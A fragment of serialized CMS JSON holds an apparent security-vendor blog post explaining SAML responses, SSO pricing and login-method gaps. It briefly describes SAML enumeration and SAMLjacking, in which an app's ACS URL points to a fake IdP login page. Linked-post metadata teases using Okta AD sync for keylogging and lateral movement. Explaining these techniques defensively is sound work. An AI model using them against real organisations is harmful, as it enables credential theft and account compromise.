names.",[],{},{"nodeType":178,"data":266019,"content":266020},{},[266021],{"nodeType":173,"value":266022,"marks":266023,"data":266024},"A typical SAML response is Base64 encoded and included as a POST request to the SP. Below is an edited version for a user attempting to log into Okta via SAML, with Google Workspace as the IdP. As SAML responses contain plenty of information, I’ve broken it down into sections to cover it in an easier manner:",[],{},{"nodeType":235,"data":266026,"content":266027},{},[266028],{"nodeType":173,"value":266029,"marks":266030,"data":266031},"Destination, issuer, and status",[],{},{"nodeType":178,"data":266033,"content":266034},{},[266035],{"nodeType":173,"value":266036,"marks":266037,"data":266038},"Right at the top of the SAML response we have the “Destination” and “Issuer” statements. “Destination” is typically the app or SP where the SAML response is meant to go, and the “Issuer” is the service that created the response. In this case, we can see that the destination is for our Okta tenant, and it originated from our Google Workspace tenant. The status of the response is also included to signify whether the request to the IdP was successful.",[],{},{"nodeType":312,"data":266040,"content":266044},{"target":266041},{"sys":266042},{"id":266043,"type":317,"linkType":318},"7JATVQgHqm8cy9D9UviD2D",[],{"nodeType":235,"data":266046,"content":266047},{},[266048],{"nodeType":173,"value":266049,"marks":266050,"data":266051},"Assertion issuer and signature information",[],{},{"nodeType":178,"data":266053,"content":266054},{},[266055],{"nodeType":173,"value":266056,"marks":266057,"data":266058},"The assertion starts with another Issuer statement, which in this case is our Google Workspace IdP. This is followed by the signature generated to verify that the contents of the assertion have not been tampered with. You can also note the “X509SubjectName” statement which includes information about the certificate used by the Issuer.",[],{},{"nodeType":312,"data":266060,"content":266064},{"target":266061},{"sys":266062},{"id":266063,"type":317,"linkType":318},"6lA84TLDwacNtosQxTiIag",[],{"nodeType":169,"data":266066,"content":266067},{},[266068],{"nodeType":173,"value":266069,"marks":266070,"data":266071},"Subject",[],{},{"nodeType":178,"data":266073,"content":266074},{},[266075],{"nodeType":173,"value":266076,"marks":266077,"data":266078},"As mentioned previously, the “Subject” attribute is required and always included in the assertion. The NameID format is specified, and in this case is the “emailAddress” format. The “Recipient” value is usually synonymous with the “Destination” attribute.",[],{},{"nodeType":312,"data":266080,"content":266084},{"target":266081},{"sys":266082},{"id":266083,"type":317,"linkType":318},"5zy12HCQAlkfIaAzUehaHm",[],{"nodeType":169,"data":266086,"content":266087},{},[266088],{"nodeType":173,"value":266089,"marks":266090,"data":266091},"Attribute statement",[],{},{"nodeType":178,"data":266093,"content":266094},{},[266095],{"nodeType":173,"value":266096,"marks":266097,"data":266098},"Lastly, the “AttributeStatement” is provided which contains any other attributes returned as part of the assertion. The contents of this statement will vary based on the app’s requirements and what the administrator has chosen to include when users initiate the authentication process.",[],{},{"nodeType":312,"data":266100,"content":266104},{"target":266101},{"sys":266102},{"id":266103,"type":317,"linkType":318},"7M8IEkoJqiHw4PM1Ip7d5C",[],{"nodeType":178,"data":266106,"content":266107},{},[266108],{"nodeType":173,"value":266109,"marks":266110,"data":266111},"One final note is that the above attribute names are not necessarily congruent between the IdP and app. Usually as part of the setup process the administrator will be given the opportunity to map attributes to names if necessary. ",[],{},{"nodeType":178,"data":266113,"content":266114},{},[266115],{"nodeType":173,"value":266116,"marks":266117,"data":266118},"As an example, the IdP could refer to the email attribute simply as “email”, but the app or SP is expecting it to be named “User.Email”. If this is misconfigured, the SAML login process will fail, and likely without a sufficiently descriptive message indicating what the issue is. In such cases, it is best to review logs of the app.",[],{},{"nodeType":169,"data":266120,"content":266121},{},[266122],{"nodeType":173,"value":266123,"marks":266124,"data":266125},"SAML sounds great! What’s the problem?",[],{},{"nodeType":312,"data":266127,"content":266131},{"target":266128},{"sys":266129},{"id":266130,"type":317,"linkType":318},"76aK3qObZZMQAgPl0bdbbr",[],{"nodeType":235,"data":266133,"content":266134},{},[266135],{"nodeType":173,"value":266136,"marks":266137,"data":266138},"SSO Tax",[],{},{"nodeType":178,"data":266140,"content":266141},{},[266142],{"nodeType":173,"value":266143,"marks":266144,"data":266145},"From our own experience, only about 30% of apps support SAML. Even then, it is typically held behind enterprise plans and pricing which makes it prohibitive in many situations. It’s not generally possible to rely on it for gaining control of identities in use within your organization. Depending on the app, it may be possible to use OIDC (which is a type of SSO.)",[],{},{"nodeType":312,"data":266147,"content":266151},{"target":266148},{"sys":266149},{"id":266150,"type":317,"linkType":318},"40e0kTn8Ehze8zj9mgV2kf",[],{"nodeType":235,"data":266153,"content":266154},{},[266155],{"nodeType":173,"value":266156,"marks":266157,"data":266158},"Security",[],{},{"nodeType":178,"data":266160,"content":266161},{},[266162],{"nodeType":173,"value":266163,"marks":266164,"data":266165},"SAML is usually seen as the go-to for improving identity security in organizations. However, if an attacker were to compromise your IdP it can result in widespread account compromise, and due to the nature of SSO, the attacker will have access to any account the user is able to access without further effort. This should not be taken as a criticism of SAML as this is the nature of SSO, but merely something to be aware of when responding to incidents.",[],{},{"nodeType":178,"data":266167,"content":266168},{},[266169,266173,266182],{"nodeType":173,"value":266170,"marks":266171,"data":266172},"At Push we’ve spent a lot of time looking at technology related to SaaS and found a few issues that could expose your organization to vulnerabilities when using SAML. One such vulnerability is ",[],{},{"nodeType":186,"data":266174,"content":266176},{"uri":266175},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/saml_enumeration/description.md",[266177],{"nodeType":173,"value":266178,"marks":266179,"data":266181},"SAML enumeration",[266180],{"type":194},{},{"nodeType":173,"value":266183,"marks":266184,"data":266185}," which allows an attacker to determine whether a target organization is in fact using SAML for authentication, and which IdP they are using.",[],{},{"nodeType":178,"data":266187,"content":266188},{},[266189,266193,266200,266204,266212],{"nodeType":173,"value":266190,"marks":266191,"data":266192},"Another attack you should be aware of is ",[],{},{"nodeType":186,"data":266194,"content":266195},{"uri":63250},[266196],{"nodeType":173,"value":63256,"marks":266197,"data":266199},[266198],{"type":194},{},{"nodeType":173,"value":266201,"marks":266202,"data":266203},". SAMLJacking occurs when an attacker configures a legitimate app such as ",[],{},{"nodeType":186,"data":266205,"content":266207},{"uri":266206},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/samljacking/examples/nuclino.md",[266208],{"nodeType":173,"value":259598,"marks":266209,"data":266211},[266210],{"type":194},{},{"nodeType":173,"value":266213,"marks":266214,"data":266215}," and sets the ACS URL to point to a fake login page. Designing the fake login page to look like your enterprise IdP will deceive users into entering their credentials into this phishing page and can lead to credential theft.",[],{},{"nodeType":178,"data":266217,"content":266218},{},[266219,266222,266232],{"nodeType":173,"value":180786,"marks":266220,"data":266221},[],{},{"nodeType":1698,"data":266223,"content":266226},{"target":266224},{"sys":266225},{"id":228244,"type":317,"linkType":318},[266227],{"nodeType":173,"value":266228,"marks":266229,"data":266231},"this",[266230],{"type":194},{},{"nodeType":173,"value":266233,"marks":266234,"data":266235}," blog post, Push’s VP of R&D goes over combining the SAMLjacking technique with other techniques, such as poisoned tenants.",[],{},{"nodeType":178,"data":266237,"content":266238},{},[266239,266243,266252],{"nodeType":173,"value":266240,"marks":266241,"data":266242},"These attacks don’t directly manipulate the SAML protocol as with ",[],{},{"nodeType":186,"data":266244,"content":266246},{"uri":266245},"https://research.nccgroup.com/2021/03/29/saml-xml-injection/",[266247],{"nodeType":173,"value":266248,"marks":266249,"data":266251},"XML injection attacks",[266250],{"type":194},{},{"nodeType":173,"value":266253,"marks":266254,"data":266255}," and are more to do with using legitimate services to perform unintended functions.",[],{},{"nodeType":312,"data":266257,"content":266261},{"target":266258},{"sys":266259},{"id":266260,"type":317,"linkType":318},"3uGnk5hgRpxRz7PeYkFgB2",[],{"nodeType":235,"data":266263,"content":266264},{},[266265],{"nodeType":173,"value":266266,"marks":266267,"data":266268},"Single Sign-On?",[],{},{"nodeType":178,"data":266270,"content":266271},{},[266272],{"nodeType":173,"value":266273,"marks":266274,"data":266275},"Luckily when you configure SAML for an app it solves the issue of users sharing credentials between services, right? Nope! During our research we’ve come across many apps that allow users to continue using other methods of authentication even after SAML has been configured.",[],{},{"nodeType":178,"data":266277,"content":266278},{},[266279],{"nodeType":173,"value":266280,"marks":266281,"data":266282},"When enabling SAML you may be given the ability to disable other methods of authentication such as login via email (username & password), and OIDC/social login methods. However, this varies between providers and there is no guarantee that you will be able to disable other login methods, or whether you’ll even be aware that this is an issue.",[],{},{"nodeType":178,"data":266284,"content":266285},{},[266286,266290,266297],{"nodeType":173,"value":266287,"marks":266288,"data":266289},"For more information on this subject, see ",[],{},{"nodeType":186,"data":266291,"content":266292},{"uri":832},[266293],{"nodeType":173,"value":835,"marks":266294,"data":266296},[266295],{"type":194},{},{"nodeType":173,"value":1477,"marks":266298,"data":266299},[],{},{"nodeType":169,"data":266301,"content":266302},{},[266303],{"nodeType":173,"value":40632,"marks":266304,"data":266305},[],{},{"nodeType":178,"data":266307,"content":266308},{},[266309],{"nodeType":173,"value":266310,"marks":266311,"data":266312},"Hopefully you will have a better understanding of SAML, how it works, where it can go wrong, and what to be aware of when investigating related incidents.",[],{},{"nodeType":178,"data":266314,"content":266315},{},[266316],{"nodeType":173,"value":266317,"marks":266318,"data":266319},"While SAML has been around since the 1990s and can be considered a legacy service at this point, it’s very much still part of enterprise authentication and authorization solutions. Other technologies such as OAuth2 & OIDC have provided alternative ways for providing SSO while addressing some of the issues, such as the ability to specify permission scopes when integrating with an app.",[],{},{"nodeType":178,"data":266321,"content":266322},{},[266323],{"nodeType":173,"value":266324,"marks":266325,"data":266326},"Understanding SAML’s limitations is the first step toward tackling the wider issue of identity management. Push provides the means to gain visibility into the types of apps used in your organization, their login methods, and MFA status. Push will also let you see when users are using other login methods for apps which you may not be expecting.",[],{},{"nodeType":312,"data":266328,"content":266331},{"target":266329},{"sys":266330},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":266333,"content":266334},{},[266335],{"nodeType":173,"value":37,"marks":266336,"data":266337},[],{},{"entries":266339},{"inline":266340,"hyperlink":266341,"block":266344},[],[266342],{"sys":266343,"__typename":1528,"title":252406,"slug":252407},{"id":228244},[266345,266350,266352,266358,266364,266370,266376,266382,266387,266392],{"sys":266346,"__typename":5345,"title":266347,"caption":118,"layoutMode":118,"file":266348},{"id":265969},"SAML auth flow",{"url":266349,"width":254288,"height":23880},"https://images.ctfassets.net/y1cdw1ablpvd/2ScsBeFt0HljRbBbZrZSCo/9ac2b767053e754ae2a58f7370249765/Diagram_SAMLLogonFlow.png",{"sys":266351,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":266353,"__typename":5345,"title":266354,"caption":118,"layoutMode":118,"file":266355},{"id":266043},"SAML code 1",{"url":266356,"width":266357,"height":188763},"https://images.ctfassets.net/y1cdw1ablpvd/1R8RcGujqrGK1rhJAsVEcN/cffdf85ded2c15ccbaced528b7d8659a/Screenshot_2023-12-13_at_9.45.59_AM.png",1374,{"sys":266359,"__typename":5345,"title":266360,"caption":118,"layoutMode":118,"file":266361},{"id":266063},"SAML code 2",{"url":266362,"width":132163,"height":266363},"https://images.ctfassets.net/y1cdw1ablpvd/2kZ4FgSXvwSCoCNVgrnn5P/c0e74f1d98c670fa7e05b8208808d4bd/Screenshot_2023-12-13_at_9.47.22_AM.png",1192,{"sys":266365,"__typename":5345,"title":266366,"caption":118,"layoutMode":118,"file":266367},{"id":266083},"SAML code 3",{"url":266368,"width":218046,"height":266369},"https://images.ctfassets.net/y1cdw1ablpvd/1UHkBzsKS4ri2fRuEUS6iu/ae885684893014456b39e923cb62e863/Screenshot_2023-12-13_at_9.48.32_AM.png",426,{"sys":266371,"__typename":5345,"title":266372,"caption":118,"layoutMode":118,"file":266373},{"id":266103},"SAML code 4",{"url":266374,"width":75589,"height":266375},"https://images.ctfassets.net/y1cdw1ablpvd/4biHzG6DORaDOI1ZZq93fv/3034d9bfe6768cfd2a2c47781fbadc67/Screenshot_2023-12-13_at_9.49.28_AM.png",1132,{"sys":266377,"__typename":5345,"title":266136,"caption":118,"layoutMode":118,"file":266378},{"id":266130},{"url":266379,"width":266380,"height":266381},"https://images.ctfassets.net/y1cdw1ablpvd/2FhSkqnvEG3rVdi9hny9Qe/8b1fa1ca0877576e6dd2b59794a65e98/1_SSO_tax.png",420,360,{"sys":266383,"__typename":5345,"title":266384,"caption":118,"layoutMode":118,"file":266385},{"id":266150},"Compliance Risk",{"url":266386,"width":266380,"height":266381},"https://images.ctfassets.net/y1cdw1ablpvd/5JbFnw9edUMRtp5wokPF9T/627babc4484981e13da0e86654f50a41/2_Compliance_risk.png",{"sys":266388,"__typename":5345,"title":266389,"caption":118,"layoutMode":118,"file":266390},{"id":266260},"SSO Default",{"url":266391,"width":266380,"height":266381},"https://images.ctfassets.net/y1cdw1ablpvd/5X5NNzMxNtCP1puepPyubz/26d7c278da3d337b1681a21b3e15c691/3_SSO_default.png",{"sys":266393,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:what-is-saml-sso.json","blog/what-is-saml-sso.json","blog/what-is-saml-sso",{"_path":266398,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":266399,"ogImage":118,"summary":266401,"title":162246,"subtitle":266412,"metaTitle":266412,"synopsis":228508,"hashTags":118,"publishedDate":228509,"slug":228510,"tagsCollection":266413,"relatedBlogPostsCollection":266419,"authorsCollection":268765,"content":268769,"_id":269342,"_type":5439,"_source":5440,"_file":269343,"_stem":269344,"_extension":5439},"/blog/oktajacking",{"id":227899,"publishedAt":266400},"2024-03-21T08:54:13.707Z",{"json":266402},{"data":266403,"content":266404,"nodeType":165},{},[266405],{"data":266406,"content":266407,"nodeType":178},{},[266408],{"data":266409,"marks":266410,"value":266411,"nodeType":173},{},[],"We’ll explore how Okta’s AD synchronization allows you to force Okta to capture credentials and keylog for you so you can launch convincing phishing attacks. Then we'll demonstrate how it can be used as a stealthy watering-hole style lateral movement attack.","Making Okta do keylogging for you",{"items":266414},[266415,266417],{"sys":266416,"name":505},{"id":504},{"sys":266418,"name":26137},{"id":26136},{"items":266420},[266421,267471,267877],{"__typename":1528,"sys":266422,"content":266423,"title":259436,"synopsis":259437,"hashTags":118,"publishedDate":259438,"slug":259439,"tagsCollection":267461,"authorsCollection":267467},{"id":258262},{"json":266424},{"data":266425,"content":266426,"nodeType":165},{},[266427,266433,266439,266445,266451,266457,266463,266468,266474,266480,266486,266563,266568,266574,266580,266586,266616,266622,266628,266634,266640,266645,266651,266657,266678,266684,266689,266694,266700,266706,266712,266718,266724,266730,266736,266741,266746,266753,266759,266765,266771,266777,266783,266789,266795,266801,266807,266813,266819,266825,266830,266836,266842,266848,266854,266859,266864,266870,266876,266882,266903,266909,266914,266919,266925,266930,266936,266942,266952,266958,266964,266970,266976,266982,266998,267096,267102,267108,267150,267155,267161,267167,267173,267179,267185,267191,267196,267202,267218,267224,267230,267236,267242,267248,267254,267293,267299,267350,267356,267362,267419,267425,267431,267437,267443,267449,267455],{"data":266428,"content":266429,"nodeType":178},{},[266430],{"data":266431,"marks":266432,"value":258273,"nodeType":173},{},[],{"data":266434,"content":266435,"nodeType":178},{},[266436],{"data":266437,"marks":266438,"value":258280,"nodeType":173},{},[],{"data":266440,"content":266441,"nodeType":169},{},[266442],{"data":266443,"marks":266444,"value":258287,"nodeType":173},{},[],{"data":266446,"content":266447,"nodeType":178},{},[266448],{"data":266449,"marks":266450,"value":258294,"nodeType":173},{},[],{"data":266452,"content":266453,"nodeType":178},{},[266454],{"data":266455,"marks":266456,"value":258301,"nodeType":173},{},[],{"data":266458,"content":266459,"nodeType":178},{},[266460],{"data":266461,"marks":266462,"value":258308,"nodeType":173},{},[],{"data":266464,"content":266467,"nodeType":312},{"target":266465},{"sys":266466},{"id":258313,"type":317,"linkType":318},[],{"data":266469,"content":266470,"nodeType":178},{},[266471],{"data":266472,"marks":266473,"value":258321,"nodeType":173},{},[],{"data":266475,"content":266476,"nodeType":169},{},[266477],{"data":266478,"marks":266479,"value":258328,"nodeType":173},{},[],{"data":266481,"content":266482,"nodeType":178},{},[266483],{"data":266484,"marks":266485,"value":258335,"nodeType":173},{},[],{"data":266487,"content":266488,"nodeType":250},{},[266489,266502],{"data":266490,"content":266491,"nodeType":254},{},[266492],{"data":266493,"content":266494,"nodeType":178},{},[266495,266499],{"data":266496,"marks":266497,"value":258349,"nodeType":173},{},[266498],{"type":370},{"data":266500,"marks":266501,"value":258353,"nodeType":173},{},[],{"data":266503,"content":266504,"nodeType":254},{},[266505],{"data":266506,"content":266507,"nodeType":178},{},[266508,266512,266515,266522,266525,266532,266536,266539,266546,266550,266553,266560],{"data":266509,"marks":266510,"value":258364,"nodeType":173},{},[266511],{"type":370},{"data":266513,"marks":266514,"value":258368,"nodeType":173},{},[],{"data":266516,"content":266517,"nodeType":186},{"uri":181618},[266518],{"data":266519,"marks":266520,"value":258376,"nodeType":173},{},[266521],{"type":194},{"data":266523,"marks":266524,"value":2936,"nodeType":173},{},[],{"data":266526,"content":266527,"nodeType":186},{"uri":258382},[266528],{"data":266529,"marks":266530,"value":258388,"nodeType":173},{},[266531],{"type":194},{"data":266533,"marks":266534,"value":3107,"nodeType":173},{},[266535],{"type":370},{"data":266537,"marks":266538,"value":258396,"nodeType":173},{},[],{"data":266540,"content":266541,"nodeType":186},{"uri":258399},[266542],{"data":266543,"marks":266544,"value":258405,"nodeType":173},{},[266545],{"type":194},{"data":266547,"marks":266548,"value":1477,"nodeType":173},{},[266549],{"type":370},{"data":266551,"marks":266552,"value":258413,"nodeType":173},{},[],{"data":266554,"content":266555,"nodeType":186},{"uri":181557},[266556],{"data":266557,"marks":266558,"value":258421,"nodeType":173},{},[266559],{"type":194},{"data":266561,"marks":266562,"value":37,"nodeType":173},{},[],{"data":266564,"content":266567,"nodeType":312},{"target":266565},{"sys":266566},{"id":169040,"type":317,"linkType":318},[],{"data":266569,"content":266570,"nodeType":169},{},[266571],{"data":266572,"marks":266573,"value":258436,"nodeType":173},{},[],{"data":266575,"content":266576,"nodeType":178},{},[266577],{"data":266578,"marks":266579,"value":258443,"nodeType":173},{},[],{"data":266581,"content":266582,"nodeType":178},{},[266583],{"data":266584,"marks":266585,"value":258450,"nodeType":173},{},[],{"data":266587,"content":266588,"nodeType":250},{},[266589,266598,266607],{"data":266590,"content":266591,"nodeType":254},{},[266592],{"data":266593,"content":266594,"nodeType":178},{},[266595],{"data":266596,"marks":266597,"value":258463,"nodeType":173},{},[],{"data":266599,"content":266600,"nodeType":254},{},[266601],{"data":266602,"content":266603,"nodeType":178},{},[266604],{"data":266605,"marks":266606,"value":258473,"nodeType":173},{},[],{"data":266608,"content":266609,"nodeType":254},{},[266610],{"data":266611,"content":266612,"nodeType":178},{},[266613],{"data":266614,"marks":266615,"value":258483,"nodeType":173},{},[],{"data":266617,"content":266618,"nodeType":178},{},[266619],{"data":266620,"marks":266621,"value":258490,"nodeType":173},{},[],{"data":266623,"content":266624,"nodeType":178},{},[266625],{"data":266626,"marks":266627,"value":258497,"nodeType":173},{},[],{"data":266629,"content":266630,"nodeType":178},{},[266631],{"data":266632,"marks":266633,"value":258504,"nodeType":173},{},[],{"data":266635,"content":266636,"nodeType":178},{},[266637],{"data":266638,"marks":266639,"value":258511,"nodeType":173},{},[],{"data":266641,"content":266644,"nodeType":312},{"target":266642},{"sys":266643},{"id":258516,"type":317,"linkType":318},[],{"data":266646,"content":266647,"nodeType":178},{},[266648],{"data":266649,"marks":266650,"value":258524,"nodeType":173},{},[],{"data":266652,"content":266653,"nodeType":178},{},[266654],{"data":266655,"marks":266656,"value":258531,"nodeType":173},{},[],{"data":266658,"content":266659,"nodeType":250},{},[266660,266669],{"data":266661,"content":266662,"nodeType":254},{},[266663],{"data":266664,"content":266665,"nodeType":178},{},[266666],{"data":266667,"marks":266668,"value":258544,"nodeType":173},{},[],{"data":266670,"content":266671,"nodeType":254},{},[266672],{"data":266673,"content":266674,"nodeType":178},{},[266675],{"data":266676,"marks":266677,"value":258554,"nodeType":173},{},[],{"data":266679,"content":266680,"nodeType":178},{},[266681],{"data":266682,"marks":266683,"value":258561,"nodeType":173},{},[],{"data":266685,"content":266688,"nodeType":312},{"target":266686},{"sys":266687},{"id":258566,"type":317,"linkType":318},[],{"data":266690,"content":266693,"nodeType":312},{"target":266691},{"sys":266692},{"id":258572,"type":317,"linkType":318},[],{"data":266695,"content":266696,"nodeType":169},{},[266697],{"data":266698,"marks":266699,"value":258580,"nodeType":173},{},[],{"data":266701,"content":266702,"nodeType":178},{},[266703],{"data":266704,"marks":266705,"value":258587,"nodeType":173},{},[],{"data":266707,"content":266708,"nodeType":178},{},[266709],{"data":266710,"marks":266711,"value":258594,"nodeType":173},{},[],{"data":266713,"content":266714,"nodeType":235},{},[266715],{"data":266716,"marks":266717,"value":258601,"nodeType":173},{},[],{"data":266719,"content":266720,"nodeType":178},{},[266721],{"data":266722,"marks":266723,"value":258608,"nodeType":173},{},[],{"data":266725,"content":266726,"nodeType":178},{},[266727],{"data":266728,"marks":266729,"value":258615,"nodeType":173},{},[],{"data":266731,"content":266732,"nodeType":178},{},[266733],{"data":266734,"marks":266735,"value":258622,"nodeType":173},{},[],{"data":266737,"content":266740,"nodeType":312},{"target":266738},{"sys":266739},{"id":258627,"type":317,"linkType":318},[],{"data":266742,"content":266745,"nodeType":312},{"target":266743},{"sys":266744},{"id":258633,"type":317,"linkType":318},[],{"data":266747,"content":266748,"nodeType":178},{},[266749],{"data":266750,"marks":266751,"value":258642,"nodeType":173},{},[266752],{"type":1646},{"data":266754,"content":266755,"nodeType":178},{},[266756],{"data":266757,"marks":266758,"value":258649,"nodeType":173},{},[],{"data":266760,"content":266761,"nodeType":235},{},[266762],{"data":266763,"marks":266764,"value":258656,"nodeType":173},{},[],{"data":266766,"content":266767,"nodeType":178},{},[266768],{"data":266769,"marks":266770,"value":258663,"nodeType":173},{},[],{"data":266772,"content":266773,"nodeType":178},{},[266774],{"data":266775,"marks":266776,"value":258670,"nodeType":173},{},[],{"data":266778,"content":266779,"nodeType":178},{},[266780],{"data":266781,"marks":266782,"value":258677,"nodeType":173},{},[],{"data":266784,"content":266785,"nodeType":235},{},[266786],{"data":266787,"marks":266788,"value":258684,"nodeType":173},{},[],{"data":266790,"content":266791,"nodeType":178},{},[266792],{"data":266793,"marks":266794,"value":258691,"nodeType":173},{},[],{"data":266796,"content":266797,"nodeType":178},{},[266798],{"data":266799,"marks":266800,"value":258698,"nodeType":173},{},[],{"data":266802,"content":266803,"nodeType":235},{},[266804],{"data":266805,"marks":266806,"value":258705,"nodeType":173},{},[],{"data":266808,"content":266809,"nodeType":178},{},[266810],{"data":266811,"marks":266812,"value":258712,"nodeType":173},{},[],{"data":266814,"content":266815,"nodeType":178},{},[266816],{"data":266817,"marks":266818,"value":258719,"nodeType":173},{},[],{"data":266820,"content":266821,"nodeType":178},{},[266822],{"data":266823,"marks":266824,"value":258726,"nodeType":173},{},[],{"data":266826,"content":266829,"nodeType":312},{"target":266827},{"sys":266828},{"id":209109,"type":317,"linkType":318},[],{"data":266831,"content":266832,"nodeType":169},{},[266833],{"data":266834,"marks":266835,"value":258738,"nodeType":173},{},[],{"data":266837,"content":266838,"nodeType":178},{},[266839],{"data":266840,"marks":266841,"value":258745,"nodeType":173},{},[],{"data":266843,"content":266844,"nodeType":235},{},[266845],{"data":266846,"marks":266847,"value":258752,"nodeType":173},{},[],{"data":266849,"content":266850,"nodeType":178},{},[266851],{"data":266852,"marks":266853,"value":258759,"nodeType":173},{},[],{"data":266855,"content":266858,"nodeType":312},{"target":266856},{"sys":266857},{"id":258764,"type":317,"linkType":318},[],{"data":266860,"content":266863,"nodeType":312},{"target":266861},{"sys":266862},{"id":258770,"type":317,"linkType":318},[],{"data":266865,"content":266866,"nodeType":235},{},[266867],{"data":266868,"marks":266869,"value":258778,"nodeType":173},{},[],{"data":266871,"content":266872,"nodeType":178},{},[266873],{"data":266874,"marks":266875,"value":258785,"nodeType":173},{},[],{"data":266877,"content":266878,"nodeType":178},{},[266879],{"data":266880,"marks":266881,"value":258792,"nodeType":173},{},[],{"data":266883,"content":266884,"nodeType":250},{},[266885,266894],{"data":266886,"content":266887,"nodeType":254},{},[266888],{"data":266889,"content":266890,"nodeType":178},{},[266891],{"data":266892,"marks":266893,"value":258805,"nodeType":173},{},[],{"data":266895,"content":266896,"nodeType":254},{},[266897],{"data":266898,"content":266899,"nodeType":178},{},[266900],{"data":266901,"marks":266902,"value":258815,"nodeType":173},{},[],{"data":266904,"content":266905,"nodeType":178},{},[266906],{"data":266907,"marks":266908,"value":258822,"nodeType":173},{},[],{"data":266910,"content":266913,"nodeType":312},{"target":266911},{"sys":266912},{"id":258827,"type":317,"linkType":318},[],{"data":266915,"content":266918,"nodeType":312},{"target":266916},{"sys":266917},{"id":258833,"type":317,"linkType":318},[],{"data":266920,"content":266921,"nodeType":178},{},[266922],{"data":266923,"marks":266924,"value":258841,"nodeType":173},{},[],{"data":266926,"content":266929,"nodeType":312},{"target":266927},{"sys":266928},{"id":258846,"type":317,"linkType":318},[],{"data":266931,"content":266932,"nodeType":169},{},[266933],{"data":266934,"marks":266935,"value":258854,"nodeType":173},{},[],{"data":266937,"content":266938,"nodeType":178},{},[266939],{"data":266940,"marks":266941,"value":258861,"nodeType":173},{},[],{"data":266943,"content":266944,"nodeType":178},{},[266945,266949],{"data":266946,"marks":266947,"value":258869,"nodeType":173},{},[266948],{"type":370},{"data":266950,"marks":266951,"value":1477,"nodeType":173},{},[],{"data":266953,"content":266954,"nodeType":178},{},[266955],{"data":266956,"marks":266957,"value":258879,"nodeType":173},{},[],{"data":266959,"content":266960,"nodeType":178},{},[266961],{"data":266962,"marks":266963,"value":258886,"nodeType":173},{},[],{"data":266965,"content":266966,"nodeType":178},{},[266967],{"data":266968,"marks":266969,"value":258893,"nodeType":173},{},[],{"data":266971,"content":266972,"nodeType":178},{},[266973],{"data":266974,"marks":266975,"value":258900,"nodeType":173},{},[],{"data":266977,"content":266978,"nodeType":178},{},[266979],{"data":266980,"marks":266981,"value":258907,"nodeType":173},{},[],{"data":266983,"content":266984,"nodeType":178},{},[266985,266988,266995],{"data":266986,"marks":266987,"value":230045,"nodeType":173},{},[],{"data":266989,"content":266990,"nodeType":186},{"uri":88239},[266991],{"data":266992,"marks":266993,"value":88245,"nodeType":173},{},[266994],{"type":194},{"data":266996,"marks":266997,"value":258924,"nodeType":173},{},[],{"data":266999,"content":267000,"nodeType":250},{},[267001,267020,267039,267058,267077],{"data":267002,"content":267003,"nodeType":254},{},[267004],{"data":267005,"content":267006,"nodeType":178},{},[267007,267010,267017],{"data":267008,"marks":267009,"value":37,"nodeType":173},{},[],{"data":267011,"content":267012,"nodeType":186},{"uri":59347},[267013],{"data":267014,"marks":267015,"value":230075,"nodeType":173},{},[267016],{"type":194},{"data":267018,"marks":267019,"value":37,"nodeType":173},{},[],{"data":267021,"content":267022,"nodeType":254},{},[267023],{"data":267024,"content":267025,"nodeType":178},{},[267026,267029,267036],{"data":267027,"marks":267028,"value":37,"nodeType":173},{},[],{"data":267030,"content":267031,"nodeType":186},{"uri":230093},[267032],{"data":267033,"marks":267034,"value":230096,"nodeType":173},{},[267035],{"type":194},{"data":267037,"marks":267038,"value":37,"nodeType":173},{},[],{"data":267040,"content":267041,"nodeType":254},{},[267042],{"data":267043,"content":267044,"nodeType":178},{},[267045,267048,267055],{"data":267046,"marks":267047,"value":37,"nodeType":173},{},[],{"data":267049,"content":267050,"nodeType":186},{"uri":832},[267051],{"data":267052,"marks":267053,"value":230116,"nodeType":173},{},[267054],{"type":194},{"data":267056,"marks":267057,"value":37,"nodeType":173},{},[],{"data":267059,"content":267060,"nodeType":254},{},[267061],{"data":267062,"content":267063,"nodeType":178},{},[267064,267067,267074],{"data":267065,"marks":267066,"value":37,"nodeType":173},{},[],{"data":267068,"content":267069,"nodeType":186},{"uri":197688},[267070],{"data":267071,"marks":267072,"value":230136,"nodeType":173},{},[267073],{"type":194},{"data":267075,"marks":267076,"value":37,"nodeType":173},{},[],{"data":267078,"content":267079,"nodeType":254},{},[267080],{"data":267081,"content":267082,"nodeType":178},{},[267083,267086,267093],{"data":267084,"marks":267085,"value":37,"nodeType":173},{},[],{"data":267087,"content":267088,"nodeType":186},{"uri":144083},[267089],{"data":267090,"marks":267091,"value":230156,"nodeType":173},{},[267092],{"type":194},{"data":267094,"marks":267095,"value":37,"nodeType":173},{},[],{"data":267097,"content":267098,"nodeType":169},{},[267099],{"data":267100,"marks":267101,"value":259029,"nodeType":173},{},[],{"data":267103,"content":267104,"nodeType":178},{},[267105],{"data":267106,"marks":267107,"value":259036,"nodeType":173},{},[],{"data":267109,"content":267110,"nodeType":250},{},[267111,267124,267137],{"data":267112,"content":267113,"nodeType":254},{},[267114],{"data":267115,"content":267116,"nodeType":178},{},[267117,267121],{"data":267118,"marks":267119,"value":259050,"nodeType":173},{},[267120],{"type":370},{"data":267122,"marks":267123,"value":259054,"nodeType":173},{},[],{"data":267125,"content":267126,"nodeType":254},{},[267127],{"data":267128,"content":267129,"nodeType":178},{},[267130,267134],{"data":267131,"marks":267132,"value":259065,"nodeType":173},{},[267133],{"type":370},{"data":267135,"marks":267136,"value":259069,"nodeType":173},{},[],{"data":267138,"content":267139,"nodeType":254},{},[267140],{"data":267141,"content":267142,"nodeType":178},{},[267143,267147],{"data":267144,"marks":267145,"value":259080,"nodeType":173},{},[267146],{"type":370},{"data":267148,"marks":267149,"value":259084,"nodeType":173},{},[],{"data":267151,"content":267154,"nodeType":312},{"target":267152},{"sys":267153},{"id":259089,"type":317,"linkType":318},[],{"data":267156,"content":267157,"nodeType":178},{},[267158],{"data":267159,"marks":267160,"value":259097,"nodeType":173},{},[],{"data":267162,"content":267163,"nodeType":235},{},[267164],{"data":267165,"marks":267166,"value":259104,"nodeType":173},{},[],{"data":267168,"content":267169,"nodeType":178},{},[267170],{"